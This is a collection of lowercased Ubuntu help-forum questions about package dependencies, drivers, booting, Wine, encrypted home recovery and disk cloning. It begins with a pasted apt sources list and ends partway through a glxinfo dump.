//ppa.launchpad.net/webupd8team/unstable/ubuntu precise main # wuala repository deb http : //repo.wuala.com stable main # wuala repository deb http : //repo.wuala.com stable main deb http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu precise main deb-src http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu precise main deb http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu precise main deb-src http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu precise main shane @ moses : ~ $ cat /etc/apt/sources.list.d/* deb http : //ppa.launchpad.net/bitcoin/bitcoin/ubuntu precise main deb-src http : //ppa.launchpad.net/bitcoin/bitcoin/ubuntu precise main deb http : //ppa.launchpad.net/bitcoin/bitcoin/ubuntu precise main deb-src http : //ppa.launchpad.net/bitcoin/bitcoin/ubuntu precise main deb http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu precise main deb-src http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu precise main deb http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu precise main deb-src http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu precise main deb http : //ppa.launchpad.net/ehoover/compholio/ubuntu precise main deb-src http : //ppa.launchpad.net/ehoover/compholio/ubuntu precise main deb http : //ppa.launchpad.net/ehoover/compholio/ubuntu precise main deb-src http : //ppa.launchpad.net/ehoover/compholio/ubuntu precise main deb http : //ppa.launchpad.net/fossfreedom/rhythmbox-plugins/ubuntu precise main deb-src http : //ppa.launchpad.net/fossfreedom/rhythmbox-plugins/ubuntu precise main deb http : //ppa.launchpad.net/fossfreedom/rhythmbox-plugins/ubuntu precise main deb-src http : //ppa.launchpad.net/fossfreedom/rhythmbox-plugins/ubuntu precise main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/musicmanager/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/musicmanager/deb/ stable main deb-src http : //ppa.launchpad.net/mefrio-g/plymouthmanager/ubuntu precise main deb http : //ppa.launchpad.net/mqchael/pipelight/ubuntu precise main deb-src http : //ppa.launchpad.net/mqchael/pipelight/ubuntu precise main deb http : //ppa.launchpad.net/mqchael/pipelight/ubuntu precise main deb-src http : //ppa.launchpad.net/mqchael/pipelight/ubuntu precise main deb http : //ppa.launchpad.net/phablet-team/tools/ubuntu precise main deb-src http : //ppa.launchpad.net/phablet-team/tools/ubuntu precise main deb http : //ppa.launchpad.net/phablet-team/tools/ubuntu precise main deb-src http : //ppa.launchpad.net/phablet-team/tools/ubuntu precise main deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/steam/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/steam/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf deb http : //apt.spideroak.com/ubuntu-spideroak-hardy/ release restricted deb http : //apt.spideroak.com/ubuntu-spideroak-hardy/ release restricted deb http : //repo.steampowered.com/steam/ precise steam deb-src http : //repo.steampowered.com/steam/ precise steam deb http : //repo.steampowered.com/steam/ precise steam deb-src http : //repo.steampowered.com/steam/ precise steam deb-src http : //ppa.launchpad.net/ubuntu-sdk-team/ppa/ubuntu precise main deb http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu precise main deb-src http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu precise main deb http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu precise main deb-src http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu precise main deb-src http : //ppa.launchpad.net/webupd8team/gvfs-libmtp/ubuntu precise main deb-src http : //ppa.launchpad.net/webupd8team/unstable/ubuntu precise main # wuala repository deb http : //repo.wuala.com stable main # wuala repository deb http : //repo.wuala.com stable main deb http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu precise main deb-src http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu precise main deb http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu precise main deb-src http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu precise main thanks in advance =============edit the /etc/apt/sources.list file looks different now 'cause i did some things okay , so before i posted this question i attempted to follow very thoroughly the other post that one of you suggested was a pre-existing answer to this issue . -second , i checked the ubuntu ppa manager ( with the gui and checkboxes and such ) and the checkbox for the universe ppa is selected . i disabled , and re-enabled it from here because i am afraid of messing with the file directly . also , i do n't know if this is relevant , but i noticed i have backports enabled in the settings area.. -i figure this is the issue , which would mean that i have to roll back my updates or use the backports ppa of kubuntu.. ? is it possible that i would have enabled backports manually in order to install some third party software 's dependencies ? ================edit $ apt-cache policy kde-workspace-bin kubuntu-desktop kde-workspace-bin : installed : ( none ) candidate : 4:4.8.5-0ubuntu0.3 version table : 4:4.8.5-0ubuntu0.3 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 4:4.8.2a-0ubuntu4 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages kubuntu-desktop : installed : ( none ) candidate : 1.254 version table : 1.254 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages =======edit please do n't mark this question as duplicate.. if you are referring to this post : how do i resolve unmet dependencies ? i have followed through all the suggestions and now , i am following through with the suggestion to post the contents of /etc/apt/sources.list and /etc/apt/sources.list.d/*
434405	help installing canon d530 drivers	i downloaded the drivers from the canon support website and followed the instructions in the help file but it is not working and when ran the terminal commands nothing happened and i donât know what to do next .
434410	my starcraft on wine 1.5.24 is on all workspaces	i use playonlinux and configured it to work on wine version 1.5.24 . the thing is the app is working on all workscapes , just like that so how that to work only on one ? it behaves just like any app that is on '' always visible workspace '' i i change wine version , i must agian configure the wine , but it still behaves so . the change whas about just after sc2 game whas updated . thank you !
434411	could someone provide me with a step-by-step guide to install cedarview drivers on ubuntu 12.04.4 ?	i am a newbie to linux and have been fairly happy with most aspects of ubuntu 12.04 up until now apart from the lack of proprietary drivers for the intel gma 3600 graphics chip . the cedarview drivers package under 'additional drivers ' does not install and i have tried a couple of guides to no avail . i understand that the current cedarview drivers require downgrading the kernel so the instructions would need to include this . all in all , it would be great if someone could take me through step by step , as previous attempts to install the drivers have ended up in me losing graphics altogether !
434414	fix block device name in /dev	i have several block volumes in /dev like /dev/sds . these block volumes are located on a san device . every time i restart my ubuntu server , the device names change . i was wondering if there is any way to fix the device names ( e.g . `` sds '' ) for these devices ?
434417	btsync linux client - is it bound only to local ip interface	ive just instaled the btsync client through the repositories and it allows a toolbar status icon . if i set a password for the control web interface on port 9999 the status bar icon errors with 401 communication error . is the we interface on port 9999 accessible from any other computer or is it restricted to local access only . i dont really want to leave the btsync client running if the web interface is wide open .
434418	can not install ubuntu from usb or cd/drive	i have been trying to install from flash drive , and cd with no luck . i am running a ibm thinkcenter m50 ( 8189a1eu ) pc desktop with 3gb ram . i have gone into bios and changed the boot order to be cd , or removable device first , and tried putting both of them sequentially , and then even removing hd from the list completely with no success . the machine just hangs with a black screen and a blinking cursor and allows no input . i have also pressed f12 during normal startup and attempted to select one of these boot options from the menu with the same results . i even updated the bios with no success . i have disabled the admin security features for all bootable devices in the bios . i was reading somewhere that maybe the machine is too old to install ? i also read it might have something to do with ati card , so i disabled that in bios and used the on-board one . not much happened there either . that being said i do notice that while the screen hangs while i wait for the cd or usb to boot my monitor changes resolutions from 640 x480 to 720 x 400 . all i see is blinking white underscore on black screen . addendum -i successfully booted from the windows xp disk without problems , but no luck with the ubuntu boot disk . as a test i even tried the ubuntu disk on my other machine with no success . something tells me the files extracted from the iso and put onto the usb will not work on cd ?
434422	how can i have my ubuntu pc ( 13.10 ) connect to a xbox 360 kinect ?	how can i have my xbox 360 kinect be registered as a device to my computer ? i do n't just want to be able to use it as a webcam , although that is still helpful . is there any software for ubuntu that allows me to make use of kinect while still keeping its 3d capabilities ?
434423	system monitor , settings and other windows have no decoration	i 've been using ubuntu 13.10 for a reasonable amount of time now , and i have never encountered this issue before . one day the frame ( the part with the close , minimize and maximize buttons ) just disappeared on some programs . the x button moved to the right but i ca n't resize the window and i can only move it if i alt drag . here are some screenshots ( i have hidden the user column in system monitor to hide my name ) : http : //imgur.com/a/aj3fw . i have tried uninstalling compizconfig-settings-manager and i 've reset unity . thanks ! edit : i 've also tried uninstalling and reinstalling gnome-control-center and gnome-system-monitor which seem to be the programs having issues .
434428	dash ( start menu ) - howto organize installed program icons ?	for my kid i have installed educational application bundles : `` pre-school bundle ( < 5 years old ) '' and `` primary bundle ( ages 6-12 ) '' . i am running ubuntu 12.04 desktop on my computer . i am able to see there are about 130 installed programs and i know that there are somewhere between these icons about 25 installed educational programs from the two bundles . only if they are hard to find for me i can imagine they are hard to find for my kid as well . it would be nice to have a directory in `` dash home '' made upon installation containing all programs i just installed ( like 'pre-school bundle ' and 'primary bundle ' ) . now when i click `` dash home '' to browse these programs i have to find them between all installed programs . is there a way to organize installed program-icons so they are organized and categorized to find them easily ? or is there already a way to have a good overview ? i read future ubuntu versions are more windows xp like so i have to wait for the new release ? *note , i just installed ubuntu 12.04 for the first time so maybe i just did not look well enough and still very used to windows start menu till windows 7 .
434430	installing nvidia additional driver failed in ubuntu 12.04	i have a geforce 6150se nforce 430 graphics card installed in an hp compaq presario cq5000 series desktop with an amd athlon ii x3 435 processor , 2gb ram and ubuntu 12.04 64-bit installed . i tried to install the nvidia driver from the additional drivers window for the recommended driver nvidia 304 ( nvidia web recommends version 325 , but says it is better to use the recommended ubuntu driver ! ) , but it failed ! , and i need a driver to use unity ( 3d ) . thanks in advance for your help . this is the content in the jockey.log file : 2014-03-14 18:52:35,784 debug : installing package : nvidia-304 2014-03-14 18:52:36,540 error : binary package nvidia-304 has no trusted origin , rejecting 2014-03-14 18:52:36,786 warning : modinfo for module nvidia_304 failed : error : modinfo : could not find module nvidia_304 2014-03-14 18:52:36,788 error : xorgdriverhandler.enable ( ) : package or module not installed , aborting 2014-03-14 18:52:36,805 error : xorg : nvidia_304 : get_alternative_by_name ( nvidia-304 ) returned nothing ... .etc .
434431	how can i read a crash file from /var/crash	php-frm crashed on us and dumped a file in /var/crash/_usr_sbin_php5-fpm.1002.crash there is some info in that file but what i 'm after is in the section called coredump in a base64 encoded format . how can i read what was running at the time of the crash ? thanks
434434	start up disk creator doesnt have ubuntu file	step 5 of how to create bootable usb stick on ubuntu `` select the file and click 'open ' . '' doesnt show anything under desktop after i click `` other '' .. its just blank .
434435	`` error : no targets specified and no makefile found '' when configuring eclipse for stm32 development	i 'm trying to configure eclipse for stm32 development , and i followed some video tutorial on youtube and it was ok till the last few steps when an error occured i 'm working on ubuntu 12.10 and eclipse kepler i installed eclipse , gcc , here is what happened on terminal when trying to install st-link salahuddin @ salahuddin : ~ $ cd /home/salahuddin/armtoolchains/stlink-master salahuddin @ salahuddin : ~/armtoolchains/stlink-master $ ./autogen.sh ca n't exec `` libtoolize '' : no such file or directory at /usr/bin/autoreconf line 196 . use of uninitialized value in pattern match ( m// ) at /usr/bin/autoreconf line 196. autoreconf : entering directory ` . ' autoreconf : configure.ac : not using gettext autoreconf : running : aclocal -- force autoreconf : configure.ac : tracing autoreconf : configure.ac : not using libtool autoreconf : running : /usr/bin/autoconf -- force autoreconf : configure.ac : not using autoheader autoreconf : running : automake -- add-missing -- copy -- force-missing autoreconf : leaving directory ` . ' salahuddin @ salahuddin : ~/armtoolchains/stlink-master $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking for ranlib ... ranlib checking whether gcc and cc understand -c and -o together ... yes checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking sys/mman.h usability ... yes checking sys/mman.h presence ... yes checking for sys/mman.h ... yes checking sys/poll.h usability ... yes checking sys/poll.h presence ... yes checking for sys/poll.h ... yes checking for mmap ... yes checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for usb ... no configure : error : *** required libusb-1.0 > = 1.0.0 not installed *** salahuddin @ salahuddin : ~/armtoolchains/stlink-master $ make make : *** no targets specified and no makefile found . stop . salahuddin @ salahuddin : ~/armtoolchains/stlink-master $ ls 49-stlinkv1.rules changelog depcomp install-sh src 49-stlinkv2-1.rules compile doc license stlinkv1_macosx_driver 49-stlinkv2.rules config.guess flash makefile.am stlink_v1.modprobe.conf acknowledgments config.log flashloaders makefile.in todo aclocal.m4 config.sub gdbserver mingw toremove authors configure gui missing autogen.sh configure.ac install news autom4te.cache copying install.mingw readme what does this mean and how to fix it ? ca n't exec `` libtoolize '' : no such file or directory at /usr/bin/autoreconf line 196. and how to solve the next error make : *** no targets specified and no makefile found . stop . i hope your answer will be clear as i 'm not expert thanks in advance
434436	lightdm will not start & xserver problems ubuntu 12.04	i 've been having an issue with resume after suspend for the past week and a half or so . after waking up the lock screen would be displayed , but i would not be able to type in my password . my workaround was clicking on switch users and then typing in my password to unlock my account . this worked fine until today . after clicking on switch users , nothing happened . the mouse pointer was still responsive , but nothing would happen no matter what i clicked on . i decided the best course of action would be to reset the computer with the hardware switch on the case . upon reboot , grub loaded fine , and the ubuntu splash screen would display . but the login screen would not ; even after 30 min of waiting . i attempted failsafex mode , but it gave some error about the x-server that i could n't read because grub has the wrong screen size set . i 've tried resetting the screen size in the grub configuration file , but it did n't have an effect . i 've tried uninstalling and reinstalling x-org ; no effect . and i can not get sudo dpkg-reconfigure xserver-xorg . i 'm using an insignia 1080p hdtv as my monitor via hdmi , but when it powers up it shows `` hdmi '' then changed to `` dvi 1360x768 . '' the tv does not have a dvi input . only vga and hdmi . any help you can give is greatly appreciated .
434445	how can i know which folders are created by which program ?	i have /usr/share/gtksourceview-2.0/ and i think it maybe due to mousepad or geany or medit text editors . but how can i know for sure without uninstalling them and reinstalling one-by-one ? ( i do n't know what tag to use so i put gtk . )
434446	help recovering ecryptfs user data	ubuntu 13.10 x64 chose lvm partitioning when i installed here 's the story from the beginning ... i had a problem with the fglrx drivers preventing unity from starting correctly so i tried to repair the installation by choosing the reinstall option on the liveusb installer . the installer got stuck when it was setting the time off of the ubuntu time server because the internet went out . after i aborted the installation i could n't boot nor could the installer recognize the original anymore . the partition still mounts in nautilus but it doesnt show up with `` sudo fdisk -l '' and only sda1 shows up with `` sudo df '' ( the main lvm partition is sda3 ) . i 've followed numerous guides including this one . the manual method doesnt do anything and sudo ecryptfs-recover-private /media/ubuntu/84d0cf06-7b08-4318-aad8-2f4d0b7bd57d/home/.ecryptfs/zack/.private never finishes . it gets stuck after try to recover this directory ? [ y/n ] : y how can i get my data back ?
434448	ubuntu 12.10 crashes virtualbox when installation is complete	i 'm wanting to install ubuntu 12.10 in virtualbox . i was really excited to actually use it : i never even used ubuntu before ! well after the lengthy installation ( about an hour or so ) it says something like `` setup has been completed ! you need to restart your computer before you use your new installation . '' or something . when i clicked `` restart now '' , it freezes . a minute later , virtualbox crashed . i thought `` well , i hope it will actually boot from the hard drive , right ? '' well , i removed the installation iso file from the virtual drive , and said something in a windows 9x sort of dialog box , saying an error . i reseted the virtual machine , with the iso in the virtual cd-rom drive , and a dialog box appeared when it booted . it had `` try ubuntu '' and `` install ubuntu '' . but ... b-b-b-but why ? ? ? i had wasted an hour and a half just installing ubuntu and now i have to `` try ubuntu '' . useless for me though , it 's too darn slow ! ! can someone please help me install ubuntu correctly ? thanks !
434454	diasble writes for automounts	i am trying to customize 12.04 disk . the process i am using is to configure the system and then convert it to iso ( make a live cd from hard disk install ) . one of the requirements for the target system is that all automounted ( plug-n-play ) devices should be mounted as read only . though it is not mandatory , i would also like to have all non-root media mounted in read only mode as well ( but since that would be quite complex , i am skipping that for now ) . i have searched whatever i could but the only solution i found was to prevent the automount ( using dconf-editor ) and then manually mount as read-only drive . but that is not what is expected . expected behaviour is to have the automount but in read-only mode . also , i would need to switch to 14.04 later on . if there are any differences in 14.04 in the mounting process , what are they ? ( i could n't find any )
434455	amd dual monitor tearing	so i finally got my card working all is good but , when try to use dual monitor , everything tears . i followed these directions for the install . how do i get amd/intel hybrid graphics drivers to work ? i went back added in the part for dual monitors and well it works ( ish ) , it works but still tears a bit especially whenever anything changes on the display . any help would be be great thanks .
434456	how should i install ubuntu 13.10 on an unallocated space ?	well this may seem same to existing questions but most of them tell to install ubuntu along with windows 7 in c drive . i have got an empty partition of 90 gb in which i want to install ubuntu . i 'm confused which format should it ( partition ) be in ? also , please tell me a full process to install ubuntu in this partition . i want a dual boot and do not want to lose any of my data . please also give the steps to use gparted ( i do n't know how you differentiate between c , d , e.. drives in windows 7 and sda1 , sda2 , ... in linux ) now i modified my partition so the hdd has 83.3 gb of unallocated space and 3 parttions ( 1 on which windows 7 is installed and 2 other for data ) . i tried to use install ubuntu using install alongside windows 7 but i ca n't understand the slider rule . will the slider merge all my 3 partitions and leave 1 for ubuntu ? will it result in a loss ? please provide me a link or instruct step by step how to create ext4 partition in gparted and then choose that ( in ubuntu installer ) and then create a swap partiton .
434462	windows 8 does n't start after installing ubuntu 13.10	i 've just installed ubuntu 13.10 on my acer aspireone d255e alongside an old installation of windows 8 . after the ubuntu install , i started windows and ubuntu without problems but suddenly i tried to start windows 8 and it showed me a blue screen with a : ( emoticon telling me that there was some troubles and windows could n't start . i tried with the windows auto-repair but , as expected , it did n't work . ubuntu is working very well but i need my old windows 8 operative system and i do n't know what to do to recover it . i 'm a beginner using ubuntu , so if you need any extra information , just tell me . thanks in advance !
434464	problems connecting android device	having problems detecting my sony xperia sp 's ( c5303 ) internal memory using my acer xc-600 ubuntu 12.04 lts desktop . having a quad core intel i5-3470 and nvidia geforce gt620 . help me please saviour : c .
434465	how do i recursively create a folder inside another unexistent folder ?	i want to create this folder : $ home/a/b/c/d while $ home/a is not created ! is it possible by one line in terminal ?
434467	need wireless drivers for sony vaio pcg 7v2l drivers	i cant seem to find wireless drivers that will work with ubuntu . i 'm not sure where to look . could someone advise ? thanks
434468	how to make a pendrive snapshot	i am building a nas server with ubuntu server 12.04 on an old laptop and am very happy with it . the os is installed on a 8gb pendrive ( the swap partition and grub are also installed on it ) . i did a 'backup ' using : dd if=/dev/sdb of=/mnt/nas-disk/backups/ubuntu-nas-server/pendrive.iso bs=4m i worked perfectly , in fact i made a mistake and overwrited the pendrive with garbage and i was able to restore all with : dd if=/mnt/nas-disk/backups/ubuntu-nas-server/pendrive.iso of=/dev/sdb bs=4m however , i have another pendrive with no exactly the same capacity ( it is a 8gb pendrive but has 7.9 more or less ) . when i executed the previous command and tried to boot using the new drive it did not work at all . the dd command let me know that it was not able to copy all the file in the new device . i need a way to be able to 'clone ' my pendrive in case it fails . is the any way to do that ?
434470	opengl error , open glx steam , help !	i have looked absolutely everywhere tried many things , honestly i think i 'm going to just reinstall ubuntu . so get this error when i open steam : opengl glx context is not using direct rendering , which may cause performance problems . for more information visit https : //support.steampowered.com/kb_article.php ? ref=9938- eyzb-7457 . i managed to install mesa libs , but i do n't know what to do after , i keep getting the error , i rebooted the computer after i installed the libs . before this i updated ubuntu form 13.04 to 13.10 recently , i am also new to ubuntu , but been testing it out for 2 months now , other than that idk what to do : / ever since i tried to get this game on playonlinux to work i messed something up . this is what happens when i type glxinfo name of display : :0.0 display : :0 screen : 0 direct rendering : yes server glx vendor string : sgi server glx version string : 1.4 server glx extensions : glx_arb_create_context , glx_arb_create_context_profile , glx_arb_multisample , glx_ext_create_context_es2_profile , glx_ext_import_context , glx_ext_texture_from_pixmap , glx_ext_visual_info , glx_ext_visual_rating , glx_intel_swap_event , glx_mesa_copy_sub_buffer , glx_oml_swap_method , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_sgi_swap_control client glx vendor string : mesa project and sgi client glx version string : 1.4 client glx extensions : glx_arb_create_context , glx_arb_create_context_profile , glx_arb_create_context_robustness , glx_arb_fbconfig_float , glx_arb_framebuffer_srgb , glx_arb_get_proc_address , glx_arb_multisample , glx_ext_create_context_es2_profile , glx_ext_fbconfig_packed_float , glx_ext_framebuffer_srgb , glx_ext_import_context , glx_ext_texture_from_pixmap , glx_ext_visual_info , glx_ext_visual_rating , glx_intel_swap_event , glx_mesa_copy_sub_buffer , glx_mesa_multithread_makecurrent , glx_mesa_swap_control , glx_oml_swap_method , glx_oml_sync_control , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgi_video_sync glx version : 1.4 glx extensions : glx_arb_create_context , glx_arb_create_context_profile , glx_arb_get_proc_address , glx_arb_multisample , glx_ext_create_context_es2_profile , glx_ext_import_context , glx_ext_texture_from_pixmap , glx_ext_visual_info , glx_ext_visual_rating , glx_intel_swap_event , glx_mesa_copy_sub_buffer , glx_mesa_multithread_makecurrent , glx_mesa_swap_control , glx_oml_swap_method , glx_oml_sync_control , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgi_video_sync opengl vendor string : x.org opengl renderer string : gallium 0.4 on amd palm opengl core profile version string : 3.1 ( core profile ) mesa 9.2.1 opengl core profile shading language version string : 1.40 opengl core profile context flags : ( none ) opengl core profile extensions : gl_amd_conservative_depth , gl_amd_draw_buffers_blend , gl_amd_seamless_cubemap_per_texture , gl_amd_shader_stencil_export , gl_angle_texture_compression_dxt3 , gl_angle_texture_compression_dxt5 , gl_arb_es2_compatibility , gl_arb_base_instance , gl_arb_blend_func_extended , gl_arb_conservative_depth , gl_arb_copy_buffer , gl_arb_debug_output , gl_arb_depth_buffer_float , gl_arb_depth_clamp , gl_arb_draw_buffers , gl_arb_draw_buffers_blend , gl_arb_draw_elements_base_vertex , gl_arb_draw_instanced , gl_arb_explicit_attrib_location , gl_arb_fragment_coord_conventions , gl_arb_fragment_shader , gl_arb_framebuffer_object , gl_arb_framebuffer_srgb , gl_arb_get_program_binary , gl_arb_half_float_pixel , gl_arb_half_float_vertex , gl_arb_instanced_arrays , gl_arb_internalformat_query , gl_arb_invalidate_subdata , gl_arb_map_buffer_alignment , gl_arb_map_buffer_range , gl_arb_occlusion_query2 , gl_arb_pixel_buffer_object , gl_arb_point_sprite , gl_arb_provoking_vertex , gl_arb_robustness , gl_arb_sampler_objects , gl_arb_seamless_cube_map , gl_arb_shader_bit_encoding , gl_arb_shader_objects , gl_arb_shader_stencil_export , gl_arb_shader_texture_lod , gl_arb_shading_language_420pack , gl_arb_shading_language_packing , gl_arb_sync , gl_arb_texture_buffer_object , gl_arb_texture_buffer_range , gl_arb_texture_compression_rgtc , gl_arb_texture_cube_map_array , gl_arb_texture_float , gl_arb_texture_multisample , gl_arb_texture_non_power_of_two , gl_arb_texture_rectangle , gl_arb_texture_rg , gl_arb_texture_rgb10_a2ui , gl_arb_texture_storage , gl_arb_texture_storage_multisample , gl_arb_texture_swizzle , gl_arb_timer_query , gl_arb_transform_feedback2 , gl_arb_transform_feedback3 , gl_arb_transform_feedback_instanced , gl_arb_uniform_buffer_object , gl_arb_vertex_array_bgra , gl_arb_vertex_array_object , gl_arb_vertex_shader , gl_arb_vertex_type_2_10_10_10_rev , gl_ati_blend_equation_separate , gl_ati_texture_compression_3dc , gl_ati_texture_float , gl_ati_texture_mirror_once , gl_ext_abgr , gl_ext_blend_equation_separate , gl_ext_draw_buffers2 , gl_ext_draw_instanced , gl_ext_framebuffer_blit , gl_ext_framebuffer_multisample , gl_ext_framebuffer_srgb , gl_ext_packed_depth_stencil , gl_ext_packed_float , gl_ext_pixel_buffer_object , gl_ext_provoking_vertex , gl_ext_texture_array , gl_ext_texture_compression_dxt1 , gl_ext_texture_compression_latc , gl_ext_texture_compression_rgtc , gl_ext_texture_compression_s3tc , gl_ext_texture_filter_anisotropic , gl_ext_texture_integer , gl_ext_texture_mirror_clamp , gl_ext_texture_srgb , gl_ext_texture_srgb_decode , gl_ext_texture_shared_exponent , gl_ext_texture_snorm , gl_ext_texture_swizzle , gl_ext_timer_query , gl_ext_transform_feedback , gl_ext_vertex_array_bgra , gl_ibm_multimode_draw_arrays , gl_mesa_pack_invert , gl_mesa_texture_signed_rgba , gl_nv_conditional_render , gl_nv_depth_clamp , gl_nv_packed_depth_stencil , gl_nv_texture_barrier , gl_oes_egl_image , gl_oes_read_format , gl_s3_s3tc opengl version string : 3.0 mesa 9.2.1 opengl shading language version string : 1.30 opengl context flags : ( none ) opengl extensions : gl_amd_conservative_depth , gl_amd_draw_buffers_blend , gl_amd_seamless_cubemap_per_texture , gl_amd_shader_stencil_export , gl_angle_texture_compression_dxt3 , gl_angle_texture_compression_dxt5 , gl_apple_packed_pixels , gl_apple_vertex_array_object , gl_arb_es2_compatibility , gl_arb_base_instance , gl_arb_blend_func_extended , gl_arb_color_buffer_float , gl_arb_conservative_depth , gl_arb_copy_buffer , gl_arb_debug_output , gl_arb_depth_buffer_float , gl_arb_depth_clamp , gl_arb_depth_texture , gl_arb_draw_buffers , gl_arb_draw_buffers_blend , gl_arb_draw_elements_base_vertex , gl_arb_draw_instanced , gl_arb_explicit_attrib_location , gl_arb_fragment_coord_conventions , gl_arb_fragment_program , gl_arb_fragment_program_shadow , gl_arb_fragment_shader , gl_arb_framebuffer_object , gl_arb_framebuffer_srgb , gl_arb_get_program_binary , gl_arb_half_float_pixel , gl_arb_half_float_vertex , gl_arb_instanced_arrays , gl_arb_internalformat_query , gl_arb_invalidate_subdata , gl_arb_map_buffer_alignment , gl_arb_map_buffer_range , gl_arb_multisample , gl_arb_multitexture , gl_arb_occlusion_query , gl_arb_occlusion_query2 , gl_arb_pixel_buffer_object , gl_arb_point_parameters , gl_arb_point_sprite , gl_arb_provoking_vertex , gl_arb_robustness , gl_arb_sampler_objects , gl_arb_seamless_cube_map , gl_arb_shader_bit_encoding , gl_arb_shader_objects , gl_arb_shader_stencil_export , gl_arb_shader_texture_lod , gl_arb_shading_language_100 , gl_arb_shading_language_420pack , gl_arb_shading_language_packing , gl_arb_shadow , gl_arb_sync , gl_arb_texture_border_clamp , gl_arb_texture_compression , gl_arb_texture_compression_rgtc , gl_arb_texture_cube_map , gl_arb_texture_cube_map_array , gl_arb_texture_env_add , gl_arb_texture_env_combine , gl_arb_texture_env_crossbar , gl_arb_texture_env_dot3 , gl_arb_texture_float , gl_arb_texture_mirrored_repeat , gl_arb_texture_multisample , gl_arb_texture_non_power_of_two , gl_arb_texture_rectangle , gl_arb_texture_rg , gl_arb_texture_rgb10_a2ui , gl_arb_texture_storage , gl_arb_texture_storage_multisample , gl_arb_texture_swizzle , gl_arb_timer_query , gl_arb_transform_feedback2 , gl_arb_transform_feedback3 , gl_arb_transform_feedback_instanced , gl_arb_transpose_matrix , gl_arb_uniform_buffer_object , gl_arb_vertex_array_bgra , gl_arb_vertex_array_object , gl_arb_vertex_buffer_object , gl_arb_vertex_program , gl_arb_vertex_shader , gl_arb_vertex_type_2_10_10_10_rev , gl_arb_window_pos , gl_ati_blend_equation_separate , gl_ati_draw_buffers , gl_ati_separate_stencil , gl_ati_texture_compression_3dc , gl_ati_texture_env_combine3 , gl_ati_texture_float , gl_ati_texture_mirror_once , gl_ext_abgr , gl_ext_bgra , gl_ext_blend_color , gl_ext_blend_equation_separate , gl_ext_blend_func_separate , gl_ext_blend_minmax , gl_ext_blend_subtract , gl_ext_compiled_vertex_array , gl_ext_copy_texture , gl_ext_draw_buffers2 , gl_ext_draw_instanced , gl_ext_draw_range_elements , gl_ext_fog_coord , gl_ext_framebuffer_blit , gl_ext_framebuffer_multisample , gl_ext_framebuffer_object , gl_ext_framebuffer_srgb , gl_ext_gpu_program_parameters , gl_ext_multi_draw_arrays , gl_ext_packed_depth_stencil , gl_ext_packed_float , gl_ext_packed_pixels , gl_ext_pixel_buffer_object , gl_ext_point_parameters , gl_ext_polygon_offset , gl_ext_provoking_vertex , gl_ext_rescale_normal , gl_ext_secondary_color , gl_ext_separate_specular_color , gl_ext_shadow_funcs , gl_ext_stencil_two_side , gl_ext_stencil_wrap , gl_ext_subtexture , gl_ext_texture , gl_ext_texture3d , gl_ext_texture_array , gl_ext_texture_compression_dxt1 , gl_ext_texture_compression_latc , gl_ext_texture_compression_rgtc , gl_ext_texture_compression_s3tc , gl_ext_texture_cube_map , gl_ext_texture_edge_clamp , gl_ext_texture_env_add , gl_ext_texture_env_combine , gl_ext_texture_env_dot3 , gl_ext_texture_filter_anisotropic , gl_ext_texture_integer , gl_ext_texture_lod_bias , gl_ext_texture_mirror_clamp , gl_ext_texture_object , gl_ext_texture_rectangle , gl_ext_texture_srgb , gl_ext_texture_srgb_decode , gl_ext_texture_shared_exponent , gl_ext_texture_snorm , gl_ext_texture_swizzle , gl_ext_timer_query , gl_ext_transform_feedback , gl_ext_vertex_array , gl_ext_vertex_array_bgra , gl_ibm_multimode_draw_arrays , gl_ibm_rasterpos_clip , gl_ibm_texture_mirrored_repeat , gl_ingr_blend_func_separate , 